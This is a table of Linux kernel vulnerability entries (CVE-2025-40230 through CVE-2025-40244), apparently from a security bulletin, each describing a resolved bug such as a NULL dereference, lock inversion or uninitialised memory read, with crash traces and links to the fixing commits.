| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: prevent poison consumption when splitting THP When performing memory error injection on a THP (Transparent Huge Page) mapped to userspace on an x86 server, the kernel panics with the following trace. The expected behavior is to terminate the affected process instead of panicking the kernel, as the x86 Machine Check code can recover from an in-userspace #MC. mce: [Hardware Error]: CPU 0: Machine Check Exception: f Bank 3: bd80000000070134 mce: [Hardware Error]: RIP 10:<ffffffff8372f8bc> {memchr_inv+0x4c/0xf0} mce: [Hardware Error]: TSC afff7bbff88a ADDR 1d301b000 MISC 80 PPIN 1e741e77539027db mce: [Hardware Error]: PROCESSOR 0:d06d0 TIME 1758093249 SOCKET 0 APIC 0 microcode 80000320 mce: [Hardware Error]: Run the above through 'mcelog --ascii' mce: [Hardware Error]: Machine check: Data load in unrecoverable area of kernel Kernel panic - not syncing: Fatal local machine check The root cause of this panic is that handling a memory failure triggered by an in-userspace #MC necessitates splitting the THP. The splitting process employs a mechanism, implemented in try_to_map_unused_to_zeropage(), which reads the pages in the THP to identify zero-filled pages. However, reading the pages in the THP results in a second in-kernel #MC, occurring before the initial memory_failure() completes, ultimately leading to a kernel panic. See the kernel panic call trace on the two #MCs. First Machine Check occurs // [1] memory_failure() // [2] try_to_split_thp_page() split_huge_page() split_huge_page_to_list_to_order() __folio_split() // [3] remap_page() remove_migration_ptes() remove_migration_pte() try_to_map_unused_to_zeropage() // [4] memchr_inv() // [5] Second Machine Check occurs // [6] Kernel panic [1] Triggered by accessing a hardware-poisoned THP in userspace, which is typically recoverable by terminating the affected process. [2] Call folio_set_has_hwpoisoned() before try_to_split_thp_page(). [3] Pass the RMP_USE_SHARED_ZEROPAGE remap flag to remap_page(). [4] Try to map the unused THP to zeropage. [5] Re-access pages in the hw-poisoned THP in the kernel. [6] Triggered in-kernel, leading to a kernel panic. In Step[2], memory_failure() sets the poisoned flag on the page in the THP by TestSetPageHWPoison() before calling try_to_split_thp_page(). As suggested by David Hildenbrand, fix this panic by not accessing the poisoned page in the THP during zeropage identification, while continuing to scan unaffected pages in the THP for possible zeropage mapping. This prevents a second in-kernel #MC that would cause kernel panic in Step[4]. Thanks to Andrew Zaborowski for his initial work on fixing this issue. | 2025-12-04 | not yet calculated | CVE-2025-40230 | https://git.kernel.org/stable/c/6fc0a7c99e973a50018c8b4be34914a1b5c7b383 https://git.kernel.org/stable/c/92acf4b04f255d2f0f6770bb0d0a208d8ffb2b77 https://git.kernel.org/stable/c/841a8bfcbad94bb1ba60f59ce34f75259074ae0d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock: fix lock inversion in vsock_assign_transport() Syzbot reported a potential lock inversion deadlock between vsock_register_mutex and sk_lock-AF_VSOCK when vsock_linger() is called. The issue was introduced by commit 687aa0c5581b ("vsock: Fix transport_* TOCTOU") which added vsock_register_mutex locking in vsock_assign_transport() around the transport->release() call, that can call vsock_linger(). vsock_assign_transport() can be called with sk_lock held. vsock_linger() calls sk_wait_event() that temporarily releases and re-acquires sk_lock. During this window, if another thread holds vsock_register_mutex while trying to acquire sk_lock, a circular dependency is created. Fix this by releasing vsock_register_mutex before calling transport->release() and vsock_deassign_transport(). This is safe because we don't need to hold vsock_register_mutex while releasing the old transport, and we ensure the new transport won't disappear by obtaining a module reference first via try_module_get(). | 2025-12-04 | not yet calculated | CVE-2025-40231 | https://git.kernel.org/stable/c/ce4f856c64f0bc30e29302a0ce41f4295ca391c5 https://git.kernel.org/stable/c/09bba278ccde25a14b6e5088a9e65a8717d0cccf https://git.kernel.org/stable/c/b44182c116778feaa05da52a426aeb9da1878dcf https://git.kernel.org/stable/c/42ed0784d11adebf748711e503af0eb9f1e6d81d https://git.kernel.org/stable/c/251caee792a21eb0b781aab91362b422c945e162 https://git.kernel.org/stable/c/a2a4346eea8b4cb75037dbcb20b98cb454324f80 https://git.kernel.org/stable/c/f7c877e7535260cc7a21484c994e8ce7e8cb6780 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rv: Fully convert enabled_monitors to use list_head as iterator The callbacks in enabled_monitors_seq_ops are inconsistent. Some treat the iterator as struct rv_monitor *, while others treat the iterator as struct list_head *. This causes a wrong type cast and crashes the system as reported by Nathan. Convert everything to use struct list_head * as iterator. This also makes enabled_monitors consistent with available_monitors. | 2025-12-04 | not yet calculated | CVE-2025-40232 | https://git.kernel.org/stable/c/8948a0338d33c4a7ef1e0c439a3ad1d5fe9355ae https://git.kernel.org/stable/c/103541e6a5854b08a25e4caa61e990af1009a52e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: clear extent cache after moving/defragmenting extents The extent map cache can become stale when extents are moved or defragmented, causing subsequent operations to see outdated extent flags. This triggers a BUG_ON in ocfs2_refcount_cal_cow_clusters(). The problem occurs when: 1. copy_file_range() creates a reflinked extent with OCFS2_EXT_REFCOUNTED 2. ioctl(FITRIM) triggers ocfs2_move_extents() 3. __ocfs2_move_extents_range() reads and caches the extent (flags=0x2) 4. ocfs2_move_extent()/ocfs2_defrag_extent() calls __ocfs2_move_extent() which clears OCFS2_EXT_REFCOUNTED flag on disk (flags=0x0) 5. The extent map cache is not invalidated after the move 6. Later write() operations read stale cached flags (0x2) but disk has updated flags (0x0), causing a mismatch 7. BUG_ON(!(rec->e_flags & OCFS2_EXT_REFCOUNTED)) triggers Fix by clearing the extent map cache after each extent move/defrag operation in __ocfs2_move_extents_range(). This ensures subsequent operations read fresh extent data from disk. | 2025-12-04 | not yet calculated | CVE-2025-40233 | https://git.kernel.org/stable/c/93166bc53c0e3587058327a4121daea34b4fecd5 https://git.kernel.org/stable/c/a7ee72286efba1d407c6f15a0528e43593fb7007 https://git.kernel.org/stable/c/93b1ab422f1966b71561158e1aedce4ec100f357 https://git.kernel.org/stable/c/e92af7737a94a729225d2a5d180eaaa77fe0bbc1 https://git.kernel.org/stable/c/aa6a21409dd6221bb268b56bb410e031c632ff9a https://git.kernel.org/stable/c/bb69928ed578f881e68d26aaf1a8f6e7faab3b44 https://git.kernel.org/stable/c/a21750df2f6169af6e039a3bb4893d6c9564e48d https://git.kernel.org/stable/c/78a63493f8e352296dbc7cb7b3f4973105e8679e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: alienware-wmi-wmax: Fix NULL pointer dereference in sleep handlers Devices without the AWCC interface don't initialize `awcc`. Add a check before dereferencing it in sleep handlers. | 2025-12-04 | not yet calculated | CVE-2025-40234 | https://git.kernel.org/stable/c/24c3812c9e817d19e4842d7495561594de1ddcb4 https://git.kernel.org/stable/c/a49c4d48c3b60926e6a8cec217bf95aa65388ecc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: directly free partially initialized fs_info in btrfs_check_leaked_roots() If allocation of fs_info->super_copy or fs_info->super_for_commit failed in btrfs_get_tree_subvol(), then there is no need to call btrfs_free_fs_info(). Otherwise btrfs_check_leaked_roots() would access a NULL pointer because fs_info->allocated_roots had not been initialised. syzkaller reported the following information: ------------[ cut here ]------------ BUG: unable to handle page fault for address: fffffffffffffbb0 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 64c9067 P4D 64c9067 PUD 64cb067 PMD 0 Oops: Oops: 0000 [#1] SMP KASAN PTI CPU: 0 UID: 0 PID: 1402 Comm: syz.1.35 Not tainted 6.15.8 #4 PREEMPT(lazy) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), (...) RIP: 0010:arch_atomic_read arch/x86/include/asm/atomic.h:23 [inline] RIP: 0010:raw_atomic_read include/linux/atomic/atomic-arch-fallback.h:457 [inline] RIP: 0010:atomic_read include/linux/atomic/atomic-instrumented.h:33 [inline] RIP: 0010:refcount_read include/linux/refcount.h:170 [inline] RIP: 0010:btrfs_check_leaked_roots+0x18f/0x2c0 fs/btrfs/disk-io.c:1230 [...] Call Trace: <TASK> btrfs_free_fs_info+0x310/0x410 fs/btrfs/disk-io.c:1280 btrfs_get_tree_subvol+0x592/0x6b0 fs/btrfs/super.c:2029 btrfs_get_tree+0x63/0x80 fs/btrfs/super.c:2097 vfs_get_tree+0x98/0x320 fs/super.c:1759 do_new_mount+0x357/0x660 fs/namespace.c:3899 path_mount+0x716/0x19c0 fs/namespace.c:4226 do_mount fs/namespace.c:4239 [inline] __do_sys_mount fs/namespace.c:4450 [inline] __se_sys_mount fs/namespace.c:4427 [inline] __x64_sys_mount+0x28c/0x310 fs/namespace.c:4427 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x92/0x180 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f032eaffa8d [...] | 2025-12-04 | not yet calculated | CVE-2025-40235 | https://git.kernel.org/stable/c/b1c2b4e6ffd307720ab6ce42f6749b0c02ba0a73 https://git.kernel.org/stable/c/0c2b2d4d053e9840e6da6ed581befa20309f281a https://git.kernel.org/stable/c/17679ac6df6c4830ba711835aa8cf961be36cfa1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-net: zero unused hash fields When GSO tunnel is negotiated, virtio_net_hdr_tnl_from_skb() tries to initialize the tunnel metadata but forgets to zero the unused rxhash fields. This may leak information to the other side. Fix this by zeroing the unused hash fields. | 2025-12-04 | not yet calculated | CVE-2025-40236 | https://git.kernel.org/stable/c/b625d231c66a6041e98817ffc944bf6e4c45b2e3 https://git.kernel.org/stable/c/b2284768c6b32aa224ca7d0ef0741beb434f03aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/notify: call exportfs_encode_fid with s_umount Calling inotify_show_fdinfo() on an fd watching an overlayfs inode, while the overlayfs is being unmounted, can lead to dereferencing a NULL ptr. This issue was found by syzkaller. Race Condition Diagram: Thread 1 Thread 2 -------- -------- generic_shutdown_super() shrink_dcache_for_umount sb->s_root = NULL | | vfs_read() | inotify_fdinfo() | * inode get from mark * | show_mark_fhandle(m, inode) | exportfs_encode_fid(inode, ..) | ovl_encode_fh(inode, ..) | ovl_check_encode_origin(inode) | * deref i_sb->s_root * | | v fsnotify_sb_delete(sb) Which then leads to: [ 32.133461] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000006: 0000 [#1] SMP DEBUG_PAGEALLOC KASAN NOPTI [ 32.134438] KASAN: null-ptr-deref in range [0x0000000000000030-0x0000000000000037] [ 32.135032] CPU: 1 UID: 0 PID: 4468 Comm: systemd-coredum Not tainted 6.17.0-rc6 #22 PREEMPT(none) <snip registers, unreliable trace> [ 32.143353] Call Trace: [ 32.143732] ovl_encode_fh+0xd5/0x170 [ 32.144031] exportfs_encode_inode_fh+0x12f/0x300 [ 32.144425] show_mark_fhandle+0xbe/0x1f0 [ 32.145805] inotify_fdinfo+0x226/0x2d0 [ 32.146442] inotify_show_fdinfo+0x1c5/0x350 [ 32.147168] seq_show+0x530/0x6f0 [ 32.147449] seq_read_iter+0x503/0x12a0 [ 32.148419] seq_read+0x31f/0x410 [ 32.150714] vfs_read+0x1f0/0x9e0 [ 32.152297] ksys_read+0x125/0x240 IOW ovl_check_encode_origin derefs inode->i_sb->s_root after it was set to NULL in the unmount path. Fix it by protecting the call to exportfs_encode_fid() from show_mark_fhandle() with the s_umount lock. This form of fix was suggested by Amir in [1]. [1]: https://lore.kernel.org/all/CAOQ4uxhbDwhb+2Brs1UdkoF0a3NSdBAOQPNfEHjahrgoKJpLEw@mail.gmail.com/ | 2025-12-04 | not yet calculated | CVE-2025-40237 | https://git.kernel.org/stable/c/bc1c6b803e14ea2b8f7e33b7164013f666ceb656 https://git.kernel.org/stable/c/3f307a9f7a7a2822e38ac451b73e2244e7279496 https://git.kernel.org/stable/c/d1894bc542becb0fda61e7e513b09523cab44030 https://git.kernel.org/stable/c/a7c4bb43bfdc2b9f06ee9d036028ed13a83df42a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix IPsec cleanup over MPV device When we do mlx5e_detach_netdev() we eventually disable the blocking events notifier; among those events are IPsec MPV events from IB to core. So before disabling those blocking events, make sure to also unregister the devcom device and mark all of this device's operations as complete, in order to prevent the other device from using an invalid netdev during future devcom events, which could cause the trace below. BUG: kernel NULL pointer dereference, address: 0000000000000010 PGD 146427067 P4D 146427067 PUD 146488067 PMD 0 Oops: Oops: 0000 [#1] SMP CPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1 Tainted: [W]=WARN Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core] Code: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 <48> 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40 RSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206 RAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00 RDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000 RBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000 R10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600 R13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80 FS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? __die+0x20/0x60 ? page_fault_oops+0x150/0x3e0 ? exc_page_fault+0x74/0x130 ? asm_exc_page_fault+0x22/0x30 ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core] mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core] mlx5_devcom_send_event+0x8c/0x170 [mlx5_core] blocking_event+0x17b/0x230 [mlx5_core] notifier_call_chain+0x35/0xa0 blocking_notifier_call_chain+0x3d/0x60 mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core] mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core] mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib] mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib] ? idr_alloc_cyclic+0x50/0xb0 ? __kmalloc_cache_noprof+0x167/0x340 ? __kmalloc_noprof+0x1a7/0x430 __mlx5_ib_add+0x34/0xd0 [mlx5_ib] mlx5r_probe+0xe9/0x310 [mlx5_ib] ? kernfs_add_one+0x107/0x150 ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib] auxiliary_bus_probe+0x3e/0x90 really_probe+0xc5/0x3a0 ? driver_probe_device+0x90/0x90 __driver_probe_device+0x80/0x160 driver_probe_device+0x1e/0x90 __device_attach_driver+0x7d/0x100 bus_for_each_drv+0x80/0xd0 __device_attach+0xbc/0x1f0 bus_probe_device+0x86/0xa0 device_add+0x62d/0x830 __auxiliary_device_add+0x3b/0xa0 ? auxiliary_device_init+0x41/0x90 add_adev+0xd1/0x150 [mlx5_core] mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core] esw_mode_change+0x6c/0xc0 [mlx5_core] mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core] devlink_nl_eswitch_set_doit+0x60/0xe0 genl_family_rcv_msg_doit+0xd0/0x120 genl_rcv_msg+0x180/0x2b0 ? devlink_get_from_attrs_lock+0x170/0x170 ? devlink_nl_eswitch_get_doit+0x290/0x290 ? devlink_nl_pre_doit_port_optional+0x50/0x50 ? genl_family_rcv_msg_dumpit+0xf0/0xf0 netlink_rcv_skb+0x54/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x1fc/0x2d0 netlink_sendmsg+0x1e4/0x410 __sock_sendmsg+0x38/0x60 ? sockfd_lookup_light+0x12/0x60 __sys_sendto+0x105/0x160 ? __sys_recvmsg+0x4e/0x90 __x64_sys_sendto+0x20/0x30 do_syscall_64+0x4c/0x100 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f27bc91b13a Code: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40238 | https://git.kernel.org/stable/c/7e212cebc863c2c7a82f480446cd731721451691 https://git.kernel.org/stable/c/8956686d398eca6d324d2d164f9d2a281175a3a1 https://git.kernel.org/stable/c/664f76be38a18c61151d0ef248c7e2f3afb4f3c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: phy: micrel: always set shared->phydev for LAN8814 Currently, during the LAN8814 PTP probe, shared->phydev is only set if the PTP clock actually gets set; otherwise the function returns before setting it. This is an issue because shared->phydev is used unconditionally when an IRQ is handled, especially in lan8814_gpio_process_cap, and since it was not set this causes a NULL pointer exception and crashes the kernel. So, simply always set shared->phydev to avoid the NULL pointer exception. | 2025-12-04 | not yet calculated | CVE-2025-40239 | https://git.kernel.org/stable/c/da1ef8e9eb5d4a12bec32d11636e521e7d529b9e https://git.kernel.org/stable/c/b093b06826b836c2824858669db080c190c04715 https://git.kernel.org/stable/c/399d10934740ae8cdaa4e3245f7c5f6c332da844 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: avoid NULL dereference when chunk data buffer is missing chunk->skb pointer is dereferenced in the if-block where it's supposed to be NULL only. chunk->skb can only be NULL if chunk->head_skb is not. Check for frag_list instead and do it just before replacing chunk->skb. We're sure that otherwise chunk->skb is non-NULL because of outer if() condition. | 2025-12-04 | not yet calculated | CVE-2025-40240 | https://git.kernel.org/stable/c/61cda2777b07d27459f5cac5a047c3edf9c8a1a9 https://git.kernel.org/stable/c/08165c296597075763130919f2aae59b5822f016 https://git.kernel.org/stable/c/03e80a4b04ef1fb2c61dd63216ab8d3a5dcb196f https://git.kernel.org/stable/c/4f6da435fb5d8a21cbf8cae5ca5a2ba0e1012b71 https://git.kernel.org/stable/c/cb9055ba30306ede4ad920002233d0659982f1cb https://git.kernel.org/stable/c/7a832b0f99be19df608cb75c023f8027b1789bd1 https://git.kernel.org/stable/c/89b465b54227c245ddc7cc9ed822231af21123ef https://git.kernel.org/stable/c/441f0647f7673e0e64d4910ef61a5fb8f16bfb82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix crafted invalid cases for encoded extents Robert recently reported two corrupted images that can cause system crashes, which are related to the new encoded extents introduced in Linux 6.15: - The first one [1] has plen != 0 (e.g. plen == 0x2000000) but (plen & Z_EROFS_EXTENT_PLEN_MASK) == 0. It is used to represent special extents such as sparse extents (!EROFS_MAP_MAPPED), but previously only plen == 0 was handled; - The second one [2] has pa 0xffffffffffdcffed and plen 0xb4000, then "cur [0xfffffffffffff000] += bvec.bv_len [0x1000]" in "} while ((cur += bvec.bv_len) < end);" wraps around, causing an out-of-bound access of pcl->compressed_bvecs[] in z_erofs_submit_queue(). EROFS only supports 48-bit physical block addresses (up to 1EiB for 4k blocks), so add a sanity check to enforce this. | 2025-12-04 | not yet calculated | CVE-2025-40241 | https://git.kernel.org/stable/c/00d8fe0b72f4ca0a983abced36aad2160038c421 https://git.kernel.org/stable/c/a429b76114aaca3ef1aff4cd469dcf025431bd11 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix unlikely race in gdlm_put_lock In gdlm_put_lock(), there is a small window of time in which the DFL_UNMOUNT flag has been set but the lockspace hasn't been released, yet. In that window, dlm may still call gdlm_ast() and gdlm_bast(). To prevent it from dereferencing freed glock objects, only free the glock if the lockspace has actually been released. | 2025-12-04 | not yet calculated | CVE-2025-40242 | https://git.kernel.org/stable/c/279bde3bbb0ac0bad5c729dfa85983d75a5d7641 https://git.kernel.org/stable/c/64c61b4ac645222fa7b724cef616c1f862a72a40 https://git.kernel.org/stable/c/28c4d9bc0708956c1a736a9e49fee71b65deee81 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: fix KMSAN uninit-value issue in hfs_find_set_zero_bits() syzbot reported an issue in hfs_find_set_zero_bits(): ===================================================== BUG: KMSAN: uninit-value in hfs_find_set_zero_bits+0x74d/0xb60 fs/hfs/bitmap.c:45 hfs_find_set_zero_bits+0x74d/0xb60 fs/hfs/bitmap.c:45 hfs_vbm_search_free+0x13c/0x5b0 fs/hfs/bitmap.c:151 hfs_extend_file+0x6a5/0x1b00 fs/hfs/extent.c:408 hfs_get_block+0x435/0x1150 fs/hfs/extent.c:353 __block_write_begin_int+0xa76/0x3030 fs/buffer.c:2151 block_write_begin fs/buffer.c:2262 [inline] cont_write_begin+0x10e1/0x1bc0 fs/buffer.c:2601 hfs_write_begin+0x85/0x130 fs/hfs/inode.c:52 cont_expand_zero fs/buffer.c:2528 [inline] cont_write_begin+0x35a/0x1bc0 fs/buffer.c:2591 hfs_write_begin+0x85/0x130 fs/hfs/inode.c:52 hfs_file_truncate+0x1d6/0xe60 fs/hfs/extent.c:494 hfs_inode_setattr+0x964/0xaa0 fs/hfs/inode.c:654 notify_change+0x1993/0x1aa0 fs/attr.c:552 do_truncate+0x28f/0x310 fs/open.c:68 do_ftruncate+0x698/0x730 fs/open.c:195 do_sys_ftruncate fs/open.c:210 [inline] __do_sys_ftruncate fs/open.c:215 [inline] __se_sys_ftruncate fs/open.c:213 [inline] __x64_sys_ftruncate+0x11b/0x250 fs/open.c:213 x64_sys_call+0xfe3/0x3db0 arch/x86/include/generated/asm/syscalls_64.h:78 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:4154 [inline] slab_alloc_node mm/slub.c:4197 [inline] __kmalloc_cache_noprof+0x7f7/0xed0 mm/slub.c:4354 kmalloc_noprof include/linux/slab.h:905 [inline] hfs_mdb_get+0x1cc8/0x2a90 fs/hfs/mdb.c:175 hfs_fill_super+0x3d0/0xb80 fs/hfs/super.c:337 get_tree_bdev_flags+0x6e3/0x920 fs/super.c:1681 get_tree_bdev+0x38/0x50 fs/super.c:1704 hfs_get_tree+0x35/0x40 fs/hfs/super.c:388 vfs_get_tree+0xb0/0x5c0 fs/super.c:1804 do_new_mount+0x738/0x1610 fs/namespace.c:3902 path_mount+0x6db/0x1e90 fs/namespace.c:4226 do_mount fs/namespace.c:4239 [inline] __do_sys_mount fs/namespace.c:4450 [inline] __se_sys_mount+0x6eb/0x7d0 fs/namespace.c:4427 __x64_sys_mount+0xe4/0x150 fs/namespace.c:4427 x64_sys_call+0xfa7/0x3db0 arch/x86/include/generated/asm/syscalls_64.h:166 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f CPU: 1 UID: 0 PID: 12609 Comm: syz.1.2692 Not tainted 6.16.0-syzkaller #0 PREEMPT(none) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025 ===================================================== The HFS_SB(sb)->bitmap buffer is allocated in hfs_mdb_get(): HFS_SB(sb)->bitmap = kmalloc(8192, GFP_KERNEL); This can trigger the reported issue because kmalloc() doesn't clear the allocated memory. If the allocated memory contains only zeros, then everything works fine. But if the allocated memory contains "garbage", then it can affect the bitmap operations and trigger the reported issue. This patch simply replaces kmalloc() with kzalloc() with the goal of guaranteeing the correctness of bitmap operations, because a newly created allocation bitmap should have all available blocks free. Potentially, the read operation that initializes the bitmap could fail to fill the whole allocated memory, and "garbage" in the uninitialized memory would then be the reason for volume corruptions and file system driver bugs. | 2025-12-04 | not yet calculated | CVE-2025-40243 | https://git.kernel.org/stable/c/fc56548fca732f3d3692c83b40db796259a03887 https://git.kernel.org/stable/c/bf1683078fbdd09a7f7f9b74121ebaa03432bd00 https://git.kernel.org/stable/c/2a112cdd66f5a132da5235ca31a320528c86bf33 https://git.kernel.org/stable/c/e148ed5cda8fd96d4620c4622fb02f552a2d166a https://git.kernel.org/stable/c/cfafefcb0e1fc60135f7040f4aed0a4aef4f76ca https://git.kernel.org/stable/c/3b447fd401824e1ccf0b769188edefe866a1e676 https://git.kernel.org/stable/c/502fa92a71f344611101bd04ef1a595b8b6014f5 https://git.kernel.org/stable/c/2048ec5b98dbdfe0b929d2e42dc7a54c389c53dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix KMSAN uninit-value issue in __hfsplus_ext_cache_extent() syzbot reported an issue in __hfsplus_ext_cache_extent(): [ 70.194323][ T9350] BUG: KMSAN: uninit-value in __hfsplus_ext_cache_extent+0x7d0/0x990 [ 70.195022][ T9350] __hfsplus_ext_cache_extent+0x7d0/0x990 [ 70.195530][ T9350] hfsplus_file_extend+0x74f/0x1cf0 [ 70.195998][ T9350] hfsplus_get_block+0xe16/0x17b0 [ 70.196458][ T9350] __block_write_begin_int+0x962/0x2ce0 [ 70.196959][ T9350] cont_write_begin+0x1000/0x1950 [ 70.197416][ T9350] hfsplus_write_begin+0x85/0x130 [ 70.197873][ T9350] generic_perform_write+0x3e8/0x1060 [ 70.198374][ T9350] __generic_file_write_iter+0x215/0x460 [ 70.198892][ T9350] generic_file_write_iter+0x109/0x5e0 [ 70.199393][ T9350] vfs_write+0xb0f/0x14e0 [ 70.199771][ T9350] ksys_write+0x23e/0x490 [ 70.200149][ T9350] __x64_sys_write+0x97/0xf0 [ 70.200570][ T9350] x64_sys_call+0x3015/0x3cf0 [ 70.201065][ T9350] do_syscall_64+0xd9/0x1d0 [ 70.201506][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.202054][ T9350] [ 70.202279][ T9350] Uninit was created at: [ 70.202693][ T9350] __kmalloc_noprof+0x621/0xf80 [ 70.203149][ T9350] hfsplus_find_init+0x8d/0x1d0 [ 70.203602][ T9350] hfsplus_file_extend+0x6ca/0x1cf0 [ 70.204087][ T9350] hfsplus_get_block+0xe16/0x17b0 [ 70.204561][ T9350] __block_write_begin_int+0x962/0x2ce0 [ 70.205074][ T9350] cont_write_begin+0x1000/0x1950 [ 70.205547][ T9350] hfsplus_write_begin+0x85/0x130 [ 70.206017][ T9350] generic_perform_write+0x3e8/0x1060 [ 70.206519][ T9350] __generic_file_write_iter+0x215/0x460 [ 70.207042][ T9350] generic_file_write_iter+0x109/0x5e0 [ 70.207552][ T9350] vfs_write+0xb0f/0x14e0 [ 70.207961][ T9350] ksys_write+0x23e/0x490 [ 70.208375][ T9350] __x64_sys_write+0x97/0xf0 [ 70.208810][ T9350] x64_sys_call+0x3015/0x3cf0 [ 70.209255][ T9350] do_syscall_64+0xd9/0x1d0 [ 70.209680][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.210230][ T9350] [ 70.210454][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Not tainted 6.12.0-rc5 #5 [ 70.211174][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 70.212115][ T9350] ===================================================== [ 70.212734][ T9350] Disabling lock debugging due to kernel taint [ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic set ... [ 70.213858][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Tainted: G B 6.12.0-rc5 #5 [ 70.214679][ T9350] Tainted: [B]=BAD_PAGE [ 70.215057][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 70.215999][ T9350] Call Trace: [ 70.216309][ T9350] <TASK> [ 70.216585][ T9350] dump_stack_lvl+0x1fd/0x2b0 [ 70.217025][ T9350] dump_stack+0x1e/0x30 [ 70.217421][ T9350] panic+0x502/0xca0 [ 70.217803][ T9350] ? kmsan_get_metadata+0x13e/0x1c0 [ 70.218294][ Message fromT sy9350] kmsan_report+0x296/slogd@syzkaller 0x2aat Aug 18 22:11:058 ... kernel :[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic [ 70.220179][ T9350] ? kmsan_get_metadata+0x13e/0x1c0 set ... [ 70.221254][ T9350] ? __msan_warning+0x96/0x120 [ 70.222066][ T9350] ? __hfsplus_ext_cache_extent+0x7d0/0x990 [ 70.223023][ T9350] ? hfsplus_file_extend+0x74f/0x1cf0 [ 70.224120][ T9350] ? hfsplus_get_block+0xe16/0x17b0 [ 70.224946][ T9350] ? __block_write_begin_int+0x962/0x2ce0 [ 70.225756][ T9350] ? cont_write_begin+0x1000/0x1950 [ 70.226337][ T9350] ? hfsplus_write_begin+0x85/0x130 [ 70.226852][ T9350] ? generic_perform_write+0x3e8/0x1060 [ 70.227405][ T9350] ? __generic_file_write_iter+0x215/0x460 [ 70.227979][ T9350] ? generic_file_write_iter+0x109/0x5e0 [ 70.228540][ T9350] ? vfs_write+0xb0f/0x14e0 [ 70.228997][ T9350] ? ksys_write+0x23e/0x490 ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40244 | https://git.kernel.org/stable/c/c1ec90bed504640a42bb20a5f413be39cd17ad71 https://git.kernel.org/stable/c/b8a72692aa42b7dcd179a96b90bc2763ac74576a 